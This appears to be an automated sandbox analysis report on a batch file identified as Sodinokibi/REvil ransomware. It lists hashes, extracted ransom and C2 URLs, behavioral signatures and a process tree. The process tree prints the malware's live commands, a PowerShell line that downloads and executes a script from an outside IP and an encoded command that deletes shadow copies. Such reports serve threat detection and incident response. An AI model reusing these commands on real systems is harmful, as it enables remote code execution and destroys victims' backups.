Analysis
-
max time kernel
136s -
max time network
53s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
03-05-2020 01:10
Static task
static1
Behavioral task
behavioral1
Sample
LVUCdSAS.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
LVUCdSAS.bat
Resource
win10v200430
General
-
Target
LVUCdSAS.bat
-
Size
191B
-
MD5
4d0d0cde7b92c8b97f2729cb95f08d3a
-
SHA1
b77bbf7812e9295554ae54b2c35ef5304904f0f5
-
SHA256
b17a151185d86157579c7ecd1903ddfd186f78f1b49899efefda2e943a6b755e
-
SHA512
5ab25f6b4ed8e39c876b939e28848546586c43d4349cd460dd9ed0948b495a000e8e237e0a67f8d14c6f23e88643eac89099c27169926106b91a1ab48bf7c706
Malware Config
Extracted
http://185.103.242.78/pastes/LVUCdSAS
Extracted
C:\59t0ty8-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/099343EE9A6C9A82
http://decryptor.cc/099343EE9A6C9A82
Signatures
-
Enumerates connected drives 3 TTPs
-
Makes http(s) request 1 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 2 http://185.103.242.78/pastes/LVUCdSAS -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 2 1480 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1312 wrote to memory of 1480 1312 cmd.exe powershell.exe PID 1480 wrote to memory of 1696 1480 powershell.exe powershell.exe PID 1480 wrote to memory of 1696 1480 powershell.exe powershell.exe PID 1480 wrote to memory of 1696 1480 powershell.exe powershell.exe PID 1480 wrote to memory of 1696 1480 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1480 powershell.exe Token: SeDebugPrivilege 1480 powershell.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeBackupPrivilege 752 vssvc.exe Token: SeRestorePrivilege 752 vssvc.exe Token: SeAuditPrivilege 752 vssvc.exe Token: SeTakeOwnershipPrivilege 1480 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1696 powershell.exe 1696 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Drops file in Program Files directory 26 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\OptimizeEdit.svg powershell.exe File opened for modification \??\c:\program files\SearchBlock.vb powershell.exe File opened for modification \??\c:\program files\ConvertFromAdd.vsx powershell.exe File opened for modification \??\c:\program files\InitializeRestart.dib powershell.exe File opened for modification \??\c:\program files\NewImport.inf powershell.exe File opened for modification \??\c:\program files\SwitchUpdate.midi powershell.exe File opened for modification \??\c:\program files\TraceSet.m4a powershell.exe File opened for modification \??\c:\program files\UnregisterComplete.xht powershell.exe File opened for modification \??\c:\program files\WatchResize.vstx powershell.exe File created \??\c:\program files\59t0ty8-readme.txt powershell.exe File created \??\c:\program files (x86)\59t0ty8-readme.txt powershell.exe File opened for modification \??\c:\program files\BackupCompare.eprtx powershell.exe File opened for modification \??\c:\program files\ResumeEdit.vsx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\59t0ty8-readme.txt powershell.exe File opened for modification \??\c:\program files\DismountDebug.xltx powershell.exe File opened for modification \??\c:\program files\InitializeCompare.mpeg2 powershell.exe File opened for modification \??\c:\program files\InitializeShow.au powershell.exe File opened for modification \??\c:\program files\LimitCopy.xlsb powershell.exe File created \??\c:\program files\microsoft sql server compact edition\59t0ty8-readme.txt powershell.exe File opened for modification \??\c:\program files\MoveRedo.asp powershell.exe File opened for modification \??\c:\program files\ResumeSync.mp4v powershell.exe File opened for modification \??\c:\program files\UnlockInstall.ods powershell.exe File opened for modification \??\c:\program files\EnterRevoke.avi powershell.exe File opened for modification \??\c:\program files\ExportSkip.dotm powershell.exe File opened for modification \??\c:\program files\GetMove.ttf powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\59t0ty8-readme.txt powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6j4yy61v.bmp" powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1480 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\LVUCdSAS.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/LVUCdSAS');Invoke-KTVNSBAG;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1696
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:752